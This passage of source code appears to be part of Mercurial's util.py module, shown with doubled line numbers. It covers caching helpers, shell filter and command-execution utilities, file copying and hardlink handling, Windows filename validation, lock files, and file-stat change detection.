1469 1469 head.prev = node
1470 1470 self._size += 1
1471 1471 return node
1472 1472
1473 1473 def lrucachefunc(func):
1474 1474 '''cache most recent results of function calls'''
1475 1475 cache = {}
1476 1476 order = collections.deque()
1477 1477 if func.__code__.co_argcount == 1:
1478 1478 def f(arg):
1479 1479 if arg not in cache:
1480 1480 if len(cache) > 20:
1481 1481 del cache[order.popleft()]
1482 1482 cache[arg] = func(arg)
1483 1483 else:
1484 1484 order.remove(arg)
1485 1485 order.append(arg)
1486 1486 return cache[arg]
1487 1487 else:
1488 1488 def f(*args):
1489 1489 if args not in cache:
1490 1490 if len(cache) > 20:
1491 1491 del cache[order.popleft()]
1492 1492 cache[args] = func(*args)
1493 1493 else:
1494 1494 order.remove(args)
1495 1495 order.append(args)
1496 1496 return cache[args]
1497 1497
1498 1498 return f
1499 1499
1500 1500 class propertycache(object):
1501 1501 def __init__(self, func):
1502 1502 self.func = func
1503 1503 self.name = func.__name__
1504 1504 def __get__(self, obj, type=None):
1505 1505 result = self.func(obj)
1506 1506 self.cachevalue(obj, result)
1507 1507 return result
1508 1508
1509 1509 def cachevalue(self, obj, value):
1510 1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1511 1511 obj.__dict__[self.name] = value
1512 1512
1513 1513 def clearcachedproperty(obj, prop):
1514 1514 '''clear a cached property value, if one has been set'''
1515 1515 if prop in obj.__dict__:
1516 1516 del obj.__dict__[prop]
1517 1517
1518 1518 def pipefilter(s, cmd):
1519 1519 '''filter string S through command CMD, returning its output'''
1520 1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1521 1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1522 1522 pout, perr = p.communicate(s)
1523 1523 return pout
1524 1524
1525 1525 def tempfilter(s, cmd):
1526 1526 '''filter string S through a pair of temporary files with CMD.
1527 1527 CMD is used as a template to create the real command to be run,
1528 1528 with the strings INFILE and OUTFILE replaced by the real names of
1529 1529 the temporary files generated.'''
1530 1530 inname, outname = None, None
1531 1531 try:
1532 1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1533 1533 fp = os.fdopen(infd, r'wb')
1534 1534 fp.write(s)
1535 1535 fp.close()
1536 1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1537 1537 os.close(outfd)
1538 1538 cmd = cmd.replace('INFILE', inname)
1539 1539 cmd = cmd.replace('OUTFILE', outname)
1540 1540 code = os.system(cmd)
1541 1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1542 1542 code = 0
1543 1543 if code:
1544 1544 raise Abort(_("command '%s' failed: %s") %
1545 1545 (cmd, explainexit(code)))
1546 1546 return readfile(outname)
1547 1547 finally:
1548 1548 try:
1549 1549 if inname:
1550 1550 os.unlink(inname)
1551 1551 except OSError:
1552 1552 pass
1553 1553 try:
1554 1554 if outname:
1555 1555 os.unlink(outname)
1556 1556 except OSError:
1557 1557 pass
1558 1558
1559 1559 filtertable = {
1560 1560 'tempfile:': tempfilter,
1561 1561 'pipe:': pipefilter,
1562 1562 }
1563 1563
1564 1564 def filter(s, cmd):
1565 1565 "filter a string through a command that transforms its input to its output"
1566 1566 for name, fn in filtertable.iteritems():
1567 1567 if cmd.startswith(name):
1568 1568 return fn(s, cmd[len(name):].lstrip())
1569 1569 return pipefilter(s, cmd)
1570 1570
1571 1571 def binary(s):
1572 1572 """return true if a string is binary data"""
1573 1573 return bool(s and '\0' in s)
1574 1574
1575 1575 def increasingchunks(source, min=1024, max=65536):
1576 1576 '''return no less than min bytes per chunk while data remains,
1577 1577 doubling min after each chunk until it reaches max'''
1578 1578 def log2(x):
1579 1579 if not x:
1580 1580 return 0
1581 1581 i = 0
1582 1582 while x:
1583 1583 x >>= 1
1584 1584 i += 1
1585 1585 return i - 1
1586 1586
1587 1587 buf = []
1588 1588 blen = 0
1589 1589 for chunk in source:
1590 1590 buf.append(chunk)
1591 1591 blen += len(chunk)
1592 1592 if blen >= min:
1593 1593 if min < max:
1594 1594 min = min << 1
1595 1595 nmin = 1 << log2(blen)
1596 1596 if nmin > min:
1597 1597 min = nmin
1598 1598 if min > max:
1599 1599 min = max
1600 1600 yield ''.join(buf)
1601 1601 blen = 0
1602 1602 buf = []
1603 1603 if buf:
1604 1604 yield ''.join(buf)
1605 1605
1606 1606 Abort = error.Abort
1607 1607
1608 1608 def always(fn):
1609 1609 return True
1610 1610
1611 1611 def never(fn):
1612 1612 return False
1613 1613
1614 1614 def nogc(func):
1615 1615 """disable garbage collector
1616 1616
1617 1617 Python's garbage collector triggers a GC each time a certain number of
1618 1618 container objects (the number being defined by gc.get_threshold()) are
1619 1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 1621 into. As a workaround, disable GC while building complex (huge)
1622 1622 containers.
1623 1623
1624 1624 This garbage collector issue have been fixed in 2.7. But it still affect
1625 1625 CPython's performance.
1626 1626 """
1627 1627 def wrapper(*args, **kwargs):
1628 1628 gcenabled = gc.isenabled()
1629 1629 gc.disable()
1630 1630 try:
1631 1631 return func(*args, **kwargs)
1632 1632 finally:
1633 1633 if gcenabled:
1634 1634 gc.enable()
1635 1635 return wrapper
1636 1636
1637 1637 if pycompat.ispypy:
1638 1638 # PyPy runs slower with gc disabled
1639 1639 nogc = lambda x: x
1640 1640
1641 1641 def pathto(root, n1, n2):
1642 1642 '''return the relative path from one place to another.
1643 1643 root should use os.sep to separate directories
1644 1644 n1 should use os.sep to separate directories
1645 1645 n2 should use "/" to separate directories
1646 1646 returns an os.sep-separated path.
1647 1647
1648 1648 If n1 is a relative path, it's assumed it's
1649 1649 relative to root.
1650 1650 n2 should always be relative to root.
1651 1651 '''
1652 1652 if not n1:
1653 1653 return localpath(n2)
1654 1654 if os.path.isabs(n1):
1655 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1656 return os.path.join(root, localpath(n2))
1657 1657 n2 = '/'.join((pconvert(root), n2))
1658 1658 a, b = splitpath(n1), n2.split('/')
1659 1659 a.reverse()
1660 1660 b.reverse()
1661 1661 while a and b and a[-1] == b[-1]:
1662 1662 a.pop()
1663 1663 b.pop()
1664 1664 b.reverse()
1665 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
1667 1667 def mainfrozen():
1668 1668 """return True if we are a frozen executable.
1669 1669
1670 1670 The code supports py2exe (most common, Windows only) and tools/freeze
1671 1671 (portable, not much used).
1672 1672 """
1673 1673 return (safehasattr(sys, "frozen") or # new py2exe
1674 1674 safehasattr(sys, "importers") or # old py2exe
1675 1675 imp.is_frozen(u"__main__")) # tools/freeze
1676 1676
1677 1677 # the location of data files matching the source code
1678 1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1679 1679 # executable version (py2exe) doesn't support __file__
1680 1680 datapath = os.path.dirname(pycompat.sysexecutable)
1681 1681 else:
1682 1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1683 1683
1684 1684 i18n.setdatapath(datapath)
1685 1685
1686 1686 _hgexecutable = None
1687 1687
1688 1688 def hgexecutable():
1689 1689 """return location of the 'hg' executable.
1690 1690
1691 1691 Defaults to $HG or 'hg' in the search path.
1692 1692 """
1693 1693 if _hgexecutable is None:
1694 1694 hg = encoding.environ.get('HG')
1695 1695 mainmod = sys.modules[r'__main__']
1696 1696 if hg:
1697 1697 _sethgexecutable(hg)
1698 1698 elif mainfrozen():
1699 1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1700 1700 # Env variable set by py2app
1701 1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1702 1702 else:
1703 1703 _sethgexecutable(pycompat.sysexecutable)
1704 1704 elif (os.path.basename(
1705 1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1706 1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1707 1707 else:
1708 1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1709 1709 _sethgexecutable(exe)
1710 1710 return _hgexecutable
1711 1711
1712 1712 def _sethgexecutable(path):
1713 1713 """set location of the 'hg' executable"""
1714 1714 global _hgexecutable
1715 1715 _hgexecutable = path
1716 1716
1717 1717 def _testfileno(f, stdf):
1718 1718 fileno = getattr(f, 'fileno', None)
1719 1719 try:
1720 1720 return fileno and fileno() == stdf.fileno()
1721 1721 except io.UnsupportedOperation:
1722 1722 return False # fileno() raised UnsupportedOperation
1723 1723
1724 1724 def isstdin(f):
1725 1725 return _testfileno(f, sys.__stdin__)
1726 1726
1727 1727 def isstdout(f):
1728 1728 return _testfileno(f, sys.__stdout__)
1729 1729
1730 1730 def shellenviron(environ=None):
1731 1731 """return environ with optional override, useful for shelling out"""
1732 1732 def py2shell(val):
1733 1733 'convert python object into string that is useful to shell'
1734 1734 if val is None or val is False:
1735 1735 return '0'
1736 1736 if val is True:
1737 1737 return '1'
1738 1738 return pycompat.bytestr(val)
1739 1739 env = dict(encoding.environ)
1740 1740 if environ:
1741 1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1742 1742 env['HG'] = hgexecutable()
1743 1743 return env
1744 1744
1745 1745 def system(cmd, environ=None, cwd=None, out=None):
1746 1746 '''enhanced shell command execution.
1747 1747 run with environment maybe modified, maybe in different dir.
1748 1748
1749 1749 if out is specified, it is assumed to be a file-like object that has a
1750 1750 write() method. stdout and stderr will be redirected to out.'''
1751 1751 try:
1752 1752 stdout.flush()
1753 1753 except Exception:
1754 1754 pass
1755 1755 cmd = quotecommand(cmd)
1756 1756 env = shellenviron(environ)
1757 1757 if out is None or isstdout(out):
1758 1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1759 1759 env=env, cwd=cwd)
1760 1760 else:
1761 1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1762 1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1763 1763 stderr=subprocess.STDOUT)
1764 1764 for line in iter(proc.stdout.readline, ''):
1765 1765 out.write(line)
1766 1766 proc.wait()
1767 1767 rc = proc.returncode
1768 1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1769 1769 rc = 0
1770 1770 return rc
1771 1771
1772 1772 def checksignature(func):
1773 1773 '''wrap a function with code to check for calling errors'''
1774 1774 def check(*args, **kwargs):
1775 1775 try:
1776 1776 return func(*args, **kwargs)
1777 1777 except TypeError:
1778 1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1779 1779 raise error.SignatureError
1780 1780 raise
1781 1781
1782 1782 return check
1783 1783
1784 1784 # a whilelist of known filesystems where hardlink works reliably
1785 1785 _hardlinkfswhitelist = {
1786 1786 'btrfs',
1787 1787 'ext2',
1788 1788 'ext3',
1789 1789 'ext4',
1790 1790 'hfs',
1791 1791 'jfs',
1792 1792 'NTFS',
1793 1793 'reiserfs',
1794 1794 'tmpfs',
1795 1795 'ufs',
1796 1796 'xfs',
1797 1797 'zfs',
1798 1798 }
1799 1799
1800 1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1801 1801 '''copy a file, preserving mode and optionally other stat info like
1802 1802 atime/mtime
1803 1803
1804 1804 checkambig argument is used with filestat, and is useful only if
1805 1805 destination file is guarded by any lock (e.g. repo.lock or
1806 1806 repo.wlock).
1807 1807
1808 1808 copystat and checkambig should be exclusive.
1809 1809 '''
1810 1810 assert not (copystat and checkambig)
1811 1811 oldstat = None
1812 1812 if os.path.lexists(dest):
1813 1813 if checkambig:
1814 1814 oldstat = checkambig and filestat.frompath(dest)
1815 1815 unlink(dest)
1816 1816 if hardlink:
1817 1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1818 1818 # unless we are confident that dest is on a whitelisted filesystem.
1819 1819 try:
1820 1820 fstype = getfstype(os.path.dirname(dest))
1821 1821 except OSError:
1822 1822 fstype = None
1823 1823 if fstype not in _hardlinkfswhitelist:
1824 1824 hardlink = False
1825 1825 if hardlink:
1826 1826 try:
1827 1827 oslink(src, dest)
1828 1828 return
1829 1829 except (IOError, OSError):
1830 1830 pass # fall back to normal copy
1831 1831 if os.path.islink(src):
1832 1832 os.symlink(os.readlink(src), dest)
1833 1833 # copytime is ignored for symlinks, but in general copytime isn't needed
1834 1834 # for them anyway
1835 1835 else:
1836 1836 try:
1837 1837 shutil.copyfile(src, dest)
1838 1838 if copystat:
1839 1839 # copystat also copies mode
1840 1840 shutil.copystat(src, dest)
1841 1841 else:
1842 1842 shutil.copymode(src, dest)
1843 1843 if oldstat and oldstat.stat:
1844 1844 newstat = filestat.frompath(dest)
1845 1845 if newstat.isambig(oldstat):
1846 1846 # stat of copied file is ambiguous to original one
1847 1847 advanced = (
1848 1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1849 1849 os.utime(dest, (advanced, advanced))
1850 1850 except shutil.Error as inst:
1851 1851 raise Abort(str(inst))
1852 1852
1853 1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1854 1854 """Copy a directory tree using hardlinks if possible."""
1855 1855 num = 0
1856 1856
1857 1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1858 1858
1859 1859 if os.path.isdir(src):
1860 1860 if hardlink is None:
1861 1861 hardlink = (os.stat(src).st_dev ==
1862 1862 os.stat(os.path.dirname(dst)).st_dev)
1863 1863 topic = gettopic()
1864 1864 os.mkdir(dst)
1865 1865 for name, kind in listdir(src):
1866 1866 srcname = os.path.join(src, name)
1867 1867 dstname = os.path.join(dst, name)
1868 1868 def nprog(t, pos):
1869 1869 if pos is not None:
1870 1870 return progress(t, pos + num)
1871 1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1872 1872 num += n
1873 1873 else:
1874 1874 if hardlink is None:
1875 1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1876 1876 os.stat(os.path.dirname(dst)).st_dev)
1877 1877 topic = gettopic()
1878 1878
1879 1879 if hardlink:
1880 1880 try:
1881 1881 oslink(src, dst)
1882 1882 except (IOError, OSError):
1883 1883 hardlink = False
1884 1884 shutil.copy(src, dst)
1885 1885 else:
1886 1886 shutil.copy(src, dst)
1887 1887 num += 1
1888 1888 progress(topic, num)
1889 1889 progress(topic, None)
1890 1890
1891 1891 return hardlink, num
1892 1892
1893 1893 _winreservednames = {
1894 1894 'con', 'prn', 'aux', 'nul',
1895 1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1896 1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1897 1897 }
1898 1898 _winreservedchars = ':*?"<>|'
1899 1899 def checkwinfilename(path):
1900 1900 r'''Check that the base-relative path is a valid filename on Windows.
1901 1901 Returns None if the path is ok, or a UI string describing the problem.
1902 1902
1903 1903 >>> checkwinfilename(b"just/a/normal/path")
1904 1904 >>> checkwinfilename(b"foo/bar/con.xml")
1905 1905 "filename contains 'con', which is reserved on Windows"
1906 1906 >>> checkwinfilename(b"foo/con.xml/bar")
1907 1907 "filename contains 'con', which is reserved on Windows"
1908 1908 >>> checkwinfilename(b"foo/bar/xml.con")
1909 1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1910 1910 "filename contains 'AUX', which is reserved on Windows"
1911 1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1912 1912 "filename contains ':', which is reserved on Windows"
1913 1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1914 1914 "filename contains '\\x07', which is invalid on Windows"
1915 1915 >>> checkwinfilename(b"foo/bar/bla ")
1916 1916 "filename ends with ' ', which is not allowed on Windows"
1917 1917 >>> checkwinfilename(b"../bar")
1918 1918 >>> checkwinfilename(b"foo\\")
1919 1919 "filename ends with '\\', which is invalid on Windows"
1920 1920 >>> checkwinfilename(b"foo\\/bar")
1921 1921 "directory name ends with '\\', which is invalid on Windows"
1922 1922 '''
1923 1923 if path.endswith('\\'):
1924 1924 return _("filename ends with '\\', which is invalid on Windows")
1925 1925 if '\\/' in path:
1926 1926 return _("directory name ends with '\\', which is invalid on Windows")
1927 1927 for n in path.replace('\\', '/').split('/'):
1928 1928 if not n:
1929 1929 continue
1930 1930 for c in _filenamebytestr(n):
1931 1931 if c in _winreservedchars:
1932 1932 return _("filename contains '%s', which is reserved "
1933 1933 "on Windows") % c
1934 1934 if ord(c) <= 31:
1935 1935 return _("filename contains '%s', which is invalid "
1936 1936 "on Windows") % escapestr(c)
1937 1937 base = n.split('.')[0]
1938 1938 if base and base.lower() in _winreservednames:
1939 1939 return _("filename contains '%s', which is reserved "
1940 1940 "on Windows") % base
1941 1941 t = n[-1:]
1942 1942 if t in '. ' and n not in '..':
1943 1943 return _("filename ends with '%s', which is not allowed "
1944 1944 "on Windows") % t
1945 1945
1946 1946 if pycompat.iswindows:
1947 1947 checkosfilename = checkwinfilename
1948 1948 timer = time.clock
1949 1949 else:
1950 1950 checkosfilename = platform.checkosfilename
1951 1951 timer = time.time
1952 1952
1953 1953 if safehasattr(time, "perf_counter"):
1954 1954 timer = time.perf_counter
1955 1955
1956 1956 def makelock(info, pathname):
1957 1957 """Create a lock file atomically if possible
1958 1958
1959 1959 This may leave a stale lock file if symlink isn't supported and signal
1960 1960 interrupt is enabled.
1961 1961 """
1962 1962 try:
1963 1963 return os.symlink(info, pathname)
1964 1964 except OSError as why:
1965 1965 if why.errno == errno.EEXIST:
1966 1966 raise
1967 1967 except AttributeError: # no symlink in os
1968 1968 pass
1969 1969
1970 1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1971 1971 ld = os.open(pathname, flags)
1972 1972 os.write(ld, info)
1973 1973 os.close(ld)
1974 1974
1975 1975 def readlock(pathname):
1976 1976 try:
1977 1977 return os.readlink(pathname)
1978 1978 except OSError as why:
1979 1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1980 1980 raise
1981 1981 except AttributeError: # no symlink in os
1982 1982 pass
1983 1983 fp = posixfile(pathname, 'rb')
1984 1984 r = fp.read()
1985 1985 fp.close()
1986 1986 return r
1987 1987
1988 1988 def fstat(fp):
1989 1989 '''stat file object that may not have fileno method.'''
1990 1990 try:
1991 1991 return os.fstat(fp.fileno())
1992 1992 except AttributeError:
1993 1993 return os.stat(fp.name)
1994 1994
1995 1995 # File system features
1996 1996
1997 1997 def fscasesensitive(path):
1998 1998 """
1999 1999 Return true if the given path is on a case-sensitive filesystem
2000 2000
2001 2001 Requires a path (like /foo/.hg) ending with a foldable final
2002 2002 directory component.
2003 2003 """
2004 2004 s1 = os.lstat(path)
2005 2005 d, b = os.path.split(path)
2006 2006 b2 = b.upper()
2007 2007 if b == b2:
2008 2008 b2 = b.lower()
2009 2009 if b == b2:
2010 2010 return True # no evidence against case sensitivity
2011 2011 p2 = os.path.join(d, b2)
2012 2012 try:
2013 2013 s2 = os.lstat(p2)
2014 2014 if s2 == s1:
2015 2015 return False
2016 2016 return True
2017 2017 except OSError:
2018 2018 return True
2019 2019
2020 2020 try:
2021 2021 import re2
2022 2022 _re2 = None
2023 2023 except ImportError:
2024 2024 _re2 = False
2025 2025
2026 2026 class _re(object):
2027 2027 def _checkre2(self):
2028 2028 global _re2
2029 2029 try:
2030 2030 # check if match works, see issue3964
2031 2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2032 2032 except ImportError:
2033 2033 _re2 = False
2034 2034
2035 2035 def compile(self, pat, flags=0):
2036 2036 '''Compile a regular expression, using re2 if possible
2037 2037
2038 2038 For best performance, use only re2-compatible regexp features. The
2039 2039 only flags from the re module that are re2-compatible are
2040 2040 IGNORECASE and MULTILINE.'''
2041 2041 if _re2 is None:
2042 2042 self._checkre2()
2043 2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2044 2044 if flags & remod.IGNORECASE:
2045 2045 pat = '(?i)' + pat
2046 2046 if flags & remod.MULTILINE:
2047 2047 pat = '(?m)' + pat
2048 2048 try:
2049 2049 return re2.compile(pat)
2050 2050 except re2.error:
2051 2051 pass
2052 2052 return remod.compile(pat, flags)
2053 2053
2054 2054 @propertycache
2055 2055 def escape(self):
2056 2056 '''Return the version of escape corresponding to self.compile.
2057 2057
2058 2058 This is imperfect because whether re2 or re is used for a particular
2059 2059 function depends on the flags, etc, but it's the best we can do.
2060 2060 '''
2061 2061 global _re2
2062 2062 if _re2 is None:
2063 2063 self._checkre2()
2064 2064 if _re2:
2065 2065 return re2.escape
2066 2066 else:
2067 2067 return remod.escape
2068 2068
2069 2069 re = _re()
2070 2070
2071 2071 _fspathcache = {}
2072 2072 def fspath(name, root):
2073 2073 '''Get name in the case stored in the filesystem
2074 2074
2075 2075 The name should be relative to root, and be normcase-ed for efficiency.
2076 2076
2077 2077 Note that this function is unnecessary, and should not be
2078 2078 called, for case-sensitive filesystems (simply because it's expensive).
2079 2079
2080 2080 The root should be normcase-ed, too.
2081 2081 '''
2082 2082 def _makefspathcacheentry(dir):
2083 2083 return dict((normcase(n), n) for n in os.listdir(dir))
2084 2084
2085 2085 seps = pycompat.ossep
2086 2086 if pycompat.osaltsep:
2087 2087 seps = seps + pycompat.osaltsep
2088 2088 # Protect backslashes. This gets silly very quickly.
2089 2089 seps.replace('\\','\\\\')
2090 2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2091 2091 dir = os.path.normpath(root)
2092 2092 result = []
2093 2093 for part, sep in pattern.findall(name):
2094 2094 if sep:
2095 2095 result.append(sep)
2096 2096 continue
2097 2097
2098 2098 if dir not in _fspathcache:
2099 2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2100 2100 contents = _fspathcache[dir]
2101 2101
2102 2102 found = contents.get(part)
2103 2103 if not found:
2104 2104 # retry "once per directory" per "dirstate.walk" which
2105 2105 # may take place for each patches of "hg qpush", for example
2106 2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2107 2107 found = contents.get(part)
2108 2108
2109 2109 result.append(found or part)
2110 2110 dir = os.path.join(dir, part)
2111 2111
2112 2112 return ''.join(result)
2113 2113
2114 2114 def checknlink(testfile):
2115 2115 '''check whether hardlink count reporting works properly'''
2116 2116
2117 2117 # testfile may be open, so we need a separate file for checking to
2118 2118 # work around issue2543 (or testfile may get lost on Samba shares)
2119 2119 f1, f2, fp = None, None, None
2120 2120 try:
2121 2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2122 2122 suffix='1~', dir=os.path.dirname(testfile))
2123 2123 os.close(fd)
2124 2124 f2 = '%s2~' % f1[:-2]
2125 2125
2126 2126 oslink(f1, f2)
2127 2127 # nlinks() may behave differently for files on Windows shares if
2128 2128 # the file is open.
2129 2129 fp = posixfile(f2)
2130 2130 return nlinks(f2) > 1
2131 2131 except OSError:
2132 2132 return False
2133 2133 finally:
2134 2134 if fp is not None:
2135 2135 fp.close()
2136 2136 for f in (f1, f2):
2137 2137 try:
2138 2138 if f is not None:
2139 2139 os.unlink(f)
2140 2140 except OSError:
2141 2141 pass
2142 2142
2143 2143 def endswithsep(path):
2144 2144 '''Check path ends with os.sep or os.altsep.'''
2145 2145 return (path.endswith(pycompat.ossep)
2146 2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2147 2147
2148 2148 def splitpath(path):
2149 2149 '''Split path by os.sep.
2150 2150 Note that this function does not use os.altsep because this is
2151 2151 an alternative of simple "xxx.split(os.sep)".
2152 2152 It is recommended to use os.path.normpath() before using this
2153 2153 function if need.'''
2154 2154 return path.split(pycompat.ossep)
2155 2155
2156 2156 def gui():
2157 2157 '''Are we running in a GUI?'''
2158 2158 if pycompat.isdarwin:
2159 2159 if 'SSH_CONNECTION' in encoding.environ:
2160 2160 # handle SSH access to a box where the user is logged in
2161 2161 return False
2162 2162 elif getattr(osutil, 'isgui', None):
2163 2163 # check if a CoreGraphics session is available
2164 2164 return osutil.isgui()
2165 2165 else:
2166 2166 # pure build; use a safe default
2167 2167 return True
2168 2168 else:
2169 2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2170 2170
2171 2171 def mktempcopy(name, emptyok=False, createmode=None):
2172 2172 """Create a temporary file with the same contents from name
2173 2173
2174 2174 The permission bits are copied from the original file.
2175 2175
2176 2176 If the temporary file is going to be truncated immediately, you
2177 2177 can use emptyok=True as an optimization.
2178 2178
2179 2179 Returns the name of the temporary file.
2180 2180 """
2181 2181 d, fn = os.path.split(name)
2182 2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2183 2183 os.close(fd)
2184 2184 # Temporary files are created with mode 0600, which is usually not
2185 2185 # what we want. If the original file already exists, just copy
2186 2186 # its mode. Otherwise, manually obey umask.
2187 2187 copymode(name, temp, createmode)
2188 2188 if emptyok:
2189 2189 return temp
2190 2190 try:
2191 2191 try:
2192 2192 ifp = posixfile(name, "rb")
2193 2193 except IOError as inst:
2194 2194 if inst.errno == errno.ENOENT:
2195 2195 return temp
2196 2196 if not getattr(inst, 'filename', None):
2197 2197 inst.filename = name
2198 2198 raise
2199 2199 ofp = posixfile(temp, "wb")
2200 2200 for chunk in filechunkiter(ifp):
2201 2201 ofp.write(chunk)
2202 2202 ifp.close()
2203 2203 ofp.close()
2204 2204 except: # re-raises
2205 2205 try:
2206 2206 os.unlink(temp)
2207 2207 except OSError:
2208 2208 pass
2209 2209 raise
2210 2210 return temp
2211 2211
2212 2212 class filestat(object):
2213 2213 """help to exactly detect change of a file
2214 2214
2215 2215 'stat' attribute is result of 'os.stat()' if specified 'path'
2216 2216 exists. Otherwise, it is None. This can avoid preparative
2217 2217 'exists()' examination on client side of this class.
2218 2218 """
2219 2219 def __init__(self, stat):
2220 2220 self.stat = stat
2221 2221
2222 2222 @classmethod
2223 2223 def frompath(cls, path):
2224 2224 try:
2225 2225 stat = os.stat(path)
2226 2226 except OSError as err:
2227 2227 if err.errno != errno.ENOENT:
2228 2228 raise
2229 2229 stat = None
2230 2230 return cls(stat)
2231 2231
2232 2232 @classmethod
2233 2233 def fromfp(cls, fp):
2234 2234 stat = os.fstat(fp.fileno())
2235 2235 return cls(stat)
2236 2236
2237 2237 __hash__ = object.__hash__
2238 2238
2239 2239 def __eq__(self, old):
2240 2240 try:
2241 2241 # if ambiguity between stat of new and old file is
2242 2242 # avoided, comparison of size, ctime and mtime is enough
2243 2243 # to exactly detect change of a file regardless of platform
2244 2244 return (self.stat.st_size == old.stat.st_size and
2245 2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2246 2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2247 2247 except AttributeError:
2248 2248 pass
2249 2249 try:
2250 2250 return self.stat is None and old.stat is None
2251 2251 except AttributeError:
2252 2252 return False
2253 2253
2254 2254 def isambig(self, old):
2255 2255 """Examine whether new (= self) stat is ambiguous against old one
2256 2256
2257 2257 "S[N]" below means stat of a file at N-th change:
2258 2258
2259 2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2260 2260 - S[n-1].ctime == S[n].ctime
2261 2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2262 2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2263 2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2264 2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2265 2265
2266 2266 Case (*2) above means that a file was changed twice or more at
2267 2267 same time in sec (= S[n-1].ctime), and comparison of timestamp
2268 2268 is ambiguous.
2269 2269
2270 2270 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2271 2271 timestamp is ambiguous".
2272 2272
2273 2273 But advancing mtime only in case (*2) doesn't work as
2274 2274 expected, because naturally advanced S[n].mtime in case (*1)
2275 2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2276 2276
2277 2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2278 2278 treated as ambiguous regardless of mtime, to avoid overlooking
2279 2279 by confliction between such mtime.
2280 2280
2281 2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2282 2282 S[n].mtime", even if size of a file isn't changed.
2283 2283 """
2284 2284 try:
2285 2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2286 2286 except AttributeError:
2287 2287 return False
2288 2288
2289 2289 def avoidambig(self, path, old):
2290 2290 """Change file stat of specified path to avoid ambiguity
2291 2291
2292 2292 'old' should be previous filestat of 'path'.
2293 2293
2294 2294 This skips avoiding ambiguity, if a process doesn't have
2295 2295 appropriate privileges for 'path'. This returns False in this
2296 2296 case.
2297 2297
2298 2298 Otherwise, this returns True, as "ambiguity is avoided".
2299 2299 """
2300 2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2301 2301 try:
2302 2302 os.utime(path, (advanced, advanced))
2303 2303 except OSError as inst:
2304 2304 if inst.errno == errno.EPERM:
2305 2305 # utime() on the file created by another user causes EPERM,
2306 2306 # if a process doesn't have appropriate privileges
2307 2307 return False
2308 2308 raise
2309 2309 return True
2310 2310
2311 2311 def __ne__(self, other):
2312 2312 return not self == other
2313 2313
2314 2314 class atomictempfile(object):
2315 2315 '''writable file object that atomically updates a file
2316 2316
2317 2317 All writes will go to a temporary copy of the original file. Call
2318 2318 close() when you are done writing, and atomictempfile will rename
2319 2319 the temporary copy to the original name, making the changes
2320 2320 visible. If the object is destroyed without being closed, all your
2321 2321 writes are discarded.
2322 2322
2323 2323 checkambig argument of constructor is used with filestat, and is
2324 2324 useful only if target file is guarded by any lock (e.g. repo.lock
2325 2325 or repo.wlock).
2326 2326 '''
2327 2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2328 2328 self.__name = name # permanent name
